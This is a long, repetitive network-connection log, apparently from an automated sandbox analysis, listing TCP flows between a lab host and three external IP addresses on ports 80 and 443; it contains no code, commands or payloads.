      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
